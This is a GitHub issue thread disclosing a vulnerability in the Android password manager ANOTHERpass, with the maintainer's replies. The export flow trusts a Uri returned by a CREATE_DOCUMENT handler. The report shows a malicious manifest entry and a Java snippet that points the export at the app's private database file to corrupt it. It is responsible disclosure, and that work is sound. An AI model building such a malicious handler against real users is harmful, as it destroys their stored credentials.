### ISSUE TITLE
Overwrite Arbitrary Files with CREATE_DOCUMENT response handler

### ISSUE THREAD

**Issue by LiveOverflow** [jenspfahl/ANOTHERpass#72]
Hey,
I found a (low severity) security issue allowing a malicious app to overwrite internal app files to corrupt data. The application trusts the Uri returned from the app handling the `android.intent.action.CREATE_DOCUMENT`, which could point into private `/data/data/de.jepfa.yapm/...` folder.

For example when "Export vault" is executed, the following code starts the app chooser:

```kotlin
if (PermissionChecker.hasRWStoragePermissions(this)) {
    val intent = Intent(Intent.ACTION_CREATE_DOCUMENT)
    intent.addCategory(Intent.CATEGORY_OPENABLE)
    intent.type = "text/json"
    intent.putExtra(Intent.EXTRA_TITLE, ShareVaultUseCase.getBackupFileName(this))
    startActivityForResult(Intent.createChooser(intent, getString(R.string.save_as)), saveAsFile)
}
```

A malicious app can register itself as an app to handle the export. 

```xml
<activity
    android:name=".ExportActivity"
    android:exported="true"
    android:visibleToInstantApps="true">
    <intent-filter android:priority="1">
        <action android:name="android.intent.action.CREATE_DOCUMENT" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.OPENABLE" />
        <data android:mimeType="text/json" />
    </intent-filter>
</activity>
```

If the user then selects the malicious app to use for the export, the malicious app can return an Intent pointing at an internal ANOTHERpass file. For example:

```java
Intent resultIntent = new Intent();
resultIntent.setData(Uri.parse("file:///data/data/de.jepfa.yapm/databases/yapm_database-wal"));
setResult(Activity.RESULT_OK, resultIntent);
finish();
```

This result intent is then handled by the `onActivityResult()` method passing the Uri over to the `FileIOService`. Which leads to the vault getting written to the internal `/databases/yapm_database-wal` file. If you relaunch the app this should have corrupted the database.

```kotlin
override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
    super.onActivityResult(requestCode, resultCode, data)
    if (resultCode == RESULT_OK && requestCode == saveAsFile) {

        data?.data?.let {
            val intent = Intent(this, FileIOService::class.java)
            intent.action = FileIOService.ACTION_EXPORT_VAULT
            intent.putExtra(FileIOService.PARAM_INCLUDE_MK, includeMasterKeySwitch.isChecked)
            intent.putExtra(FileIOService.PARAM_INCLUDE_PREFS, includePrefsSwitch.isChecked)
            intent.putExtra(FileIOService.PARAM_FILE_URI, it)
            startService(intent)

            finish()

            val upIntent = Intent(this, ListCredentialsActivity::class.java)
            navigateUpTo(upIntent)

        }

    }
}
```

The `FileIOService` or the `onActivityResult()` should not trust the Uri coming from an untrusted source and verify that the Uri doesn't point to the app internal files.

**Comment by jenspfahl** [comment]
Thank you for this report! Much appreciated 🙏. I will fix this soon!

**Comment by jenspfahl** [comment]
Will be fixed with v1.9.4
